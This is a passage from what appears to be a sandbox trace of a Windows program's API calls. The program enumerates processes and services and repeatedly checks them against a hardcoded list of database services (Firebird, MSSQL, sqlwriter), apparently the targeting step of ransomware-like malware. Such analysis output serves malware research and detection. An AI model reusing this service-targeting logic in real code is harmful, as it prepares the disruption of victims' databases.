(lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0189.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0189.559] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0189.559] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0189.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0189.559] lstrlenW (lpString="ShellHWDetection") returned 16 [0189.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.559] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0189.559] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0189.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0189.559] lstrlenW (lpString="Spooler") returned 7 [0189.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0189.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0189.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0189.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0189.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0189.560] lstrlenW (lpString="StateRepository") returned 15 [0189.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0189.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0189.560] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0189.560] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0189.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0189.560] lstrlenW (lpString="SysMain") returned 7 [0189.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0189.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0189.560] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0189.560] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0189.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0189.560] lstrlenW (lpString="SystemEventsBroker") returned 18 [0189.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0189.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0189.560] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0189.560] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0189.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0189.560] lstrlenW (lpString="Themes") returned 6 [0189.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0189.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0189.560] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0189.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0189.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0189.560] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0189.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0189.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0189.561] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0189.561] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0189.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x378 [0189.564] Process32FirstW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.565] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.566] lstrlenW (lpString="System") returned 6 [0189.566] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.567] lstrlenW (lpString="smss.exe") returned 8 [0189.567] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.568] lstrlenW (lpString="csrss.exe") returned 9 [0189.568] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.568] lstrlenW (lpString="wininit.exe") returned 11 [0189.569] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.569] lstrlenW (lpString="csrss.exe") returned 9 [0189.569] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.570] lstrlenW (lpString="winlogon.exe") returned 12 [0189.570] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.571] lstrlenW (lpString="services.exe") returned 12 [0189.571] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.572] lstrlenW (lpString="lsass.exe") returned 9 [0189.572] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.572] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.572] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.573] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.573] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.574] lstrlenW (lpString="svchost.exe") returned 11 [0189.574] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.575] lstrlenW (lpString="svchost.exe") returned 11 [0189.575] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.575] lstrlenW (lpString="dwm.exe") returned 7 [0189.576] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.576] lstrlenW (lpString="svchost.exe") returned 11 [0189.576] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.577] lstrlenW (lpString="svchost.exe") returned 11 [0189.577] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.578] lstrlenW (lpString="svchost.exe") returned 11 [0189.578] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.579] lstrlenW (lpString="svchost.exe") returned 11 [0189.579] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.579] lstrlenW (lpString="svchost.exe") returned 11 [0189.580] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.580] lstrlenW (lpString="svchost.exe") returned 11 [0189.580] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.581] lstrlenW (lpString="svchost.exe") returned 11 [0189.581] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.582] lstrlenW (lpString="svchost.exe") returned 11 [0189.582] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.583] lstrlenW (lpString="svchost.exe") returned 11 [0189.583] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.584] lstrlenW (lpString="svchost.exe") returned 11 [0189.584] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.584] lstrlenW (lpString="spoolsv.exe") returned 11 [0189.584] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.585] lstrlenW (lpString="svchost.exe") returned 11 [0189.585] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.586] lstrlenW (lpString="audiodg.exe") returned 11 [0189.586] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.587] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0189.587] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0189.588] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0189.588] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0189.588] lstrlenW (lpString="Memory Compression") returned 18 [0189.589] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.589] lstrlenW (lpString="sihost.exe") returned 10 [0189.589] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.590] lstrlenW (lpString="svchost.exe") returned 11 [0189.590] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0189.591] lstrlenW (lpString="msoia.exe") returned 9 [0189.591] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.592] lstrlenW (lpString="taskhostw.exe") returned 13 [0189.592] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.593] lstrlenW (lpString="explorer.exe") returned 12 [0189.593] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.594] lstrlenW (lpString="SearchUI.exe") returned 12 [0189.594] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.595] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0189.595] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.595] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0189.595] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.596] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0189.596] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0189.597] lstrlenW (lpString="hgaibc.exe") returned 10 [0189.597] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0189.598] CloseHandle (hObject=0x378) returned 1 [0189.598] Sleep (dwMilliseconds=0x1f4) [0190.110] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6beea8 [0190.110] EnumServicesStatusExW (in: hSCManager=0x6beea8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0190.111] GetLastError () returned 0xea [0190.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0190.111] EnumServicesStatusExW (in: hSCManager=0x6beea8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0190.112] CloseServiceHandle (hSCObject=0x6beea8) returned 1 [0190.112] lstrlenW (lpString="Appinfo") returned 7 [0190.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0190.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0190.112] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0190.112] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0190.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0190.112] lstrlenW (lpString="AppXSvc") returned 7 [0190.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0190.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0190.112] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0190.112] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0190.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0190.112] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0190.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.112] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0190.112] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0190.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0190.113] lstrlenW (lpString="Audiosrv") returned 8 [0190.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0190.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0190.113] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0190.113] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0190.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0190.113] lstrlenW (lpString="BFE") returned 3 [0190.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0190.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0190.113] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0190.113] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0190.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0190.113] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0190.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.113] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0190.113] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0190.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0190.113] lstrlenW (lpString="CDPSvc") returned 6 [0190.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0190.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0190.113] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0190.113] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0190.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0190.113] lstrlenW (lpString="ClickToRunSvc") returned 13 [0190.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.113] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0190.113] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0190.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0190.114] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0190.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.114] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0190.114] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0190.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0190.114] lstrlenW (lpString="CryptSvc") returned 8 [0190.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0190.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0190.114] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0190.114] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0190.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0190.114] lstrlenW (lpString="DcomLaunch") returned 10 [0190.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.114] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0190.114] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0190.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0190.114] lstrlenW (lpString="DeviceAssociationService") returned 24 [0190.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.114] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0190.114] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0190.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0190.114] lstrlenW (lpString="Dhcp") returned 4 [0190.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0190.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0190.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0190.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0190.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0190.115] lstrlenW (lpString="Dnscache") returned 8 [0190.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0190.115] lstrcmpiW 